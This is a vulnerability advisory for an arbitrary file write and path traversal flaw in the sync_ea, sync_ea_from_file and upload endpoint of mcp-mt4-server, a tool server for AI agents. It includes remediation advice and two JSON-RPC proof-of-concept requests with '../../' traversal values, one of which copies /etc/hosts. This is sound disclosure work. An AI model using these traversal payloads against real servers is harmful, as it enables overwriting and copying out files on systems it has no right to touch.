# Vulnerability Summary: Arbitrary File Write Vulnerability in mcp-mt4-server

## 1. Vulnerability Overview

* **Vulnerability Name**: Arbitrary File Write Vulnerability in mcp-mt4-server
* **Vulnerability Type**: External Control of File Name or Path (CWE-73)
* **Affected Components**: `src/index.ts` and `windows-server/server.js`
* **Vulnerability Description**:
  * In the `sync_ea` tool, the user-supplied `ea_name` parameter is concatenated directly into a file system path without checking that the resulting path stays inside the expected `ea-strategies/active` directory. An attacker can use `../` sequences to create or overwrite files at any location writable by the server process.
  * In the `sync_ea_from_file` tool, the `file_path` parameter lets an attacker read any local file the server process can access, and the `ea_name` parameter lets them write its contents to an arbitrary location in the same way.
  * In `windows-server/server.js`, the `POST /api/ea/upload` endpoint also accepts an `ea_name` parameter with the same path traversal flaw, so it too allows arbitrary file writes.

## 2. Impact Scope

* **Affected Version**: 1.0.0
* **Security Impact**:
  * **Integrity (High)**: attackers can create or overwrite any file writable by the server process.
  * **Availability (High)**: overwriting application files, logs, or configuration can disrupt or disable the MCP server.
  * **Confidentiality (Low-Medium)**: via `sync_ea_from_file`, any text file readable by the server process can be copied to an attacker-chosen path.
* **CVSS Score**: 8.1 (High)

## 3. Remediation Measures

* **Input Validation**: treat `ea_name` as an identifier rather than a path; reject anything that is not a plain name (path separators, `..` components, absolute paths, Windows drive letters, etc.).
* **Path Normalization**: resolve the final path with `path.resolve` and verify that it lies within the intended base directory (e.g., `ea-strategies/active`) before touching the file system. Check the resolved path, not the raw input, so that `..` and absolute inputs are caught after normalization.
* **Permission Control**: restrict what the MCP server process can reach: run it under a low-privilege account, or inside a sandbox or container, so that a traversal that slips through cannot reach sensitive files.
* **Code Fixes**: apply the same validation and normalization checks to `sync_ea`, `compile_ea`, `sync_ea_from_file`, and the HTTP upload endpoint.

## 4. Proof-of-Concept (POC) Code

**Exploiting `sync_ea` for a path traversal write:**

```json
{
  "jsonrpc": "2.0",
  "id": 1,
  "method": "tools/call",
  "params": {
    "name": "sync_ea",
    "arguments": {
      "ea_name": "../../mt4-mcp-poc",
      "ea_content": "// path traversal poc"
    }
  }
}
```

**Exploiting `sync_ea_from_file` to read an arbitrary file and write it to an attacker-chosen location:**

```json
{
  "jsonrpc": "2.0",
  "id": 1,
  "method": "tools/call",
  "params": {
    "name": "sync_ea_from_file",
    "arguments": {
      "file_path": "/etc/hosts",
      "ea_name": "../../copied-hosts"
    }
  }
}
```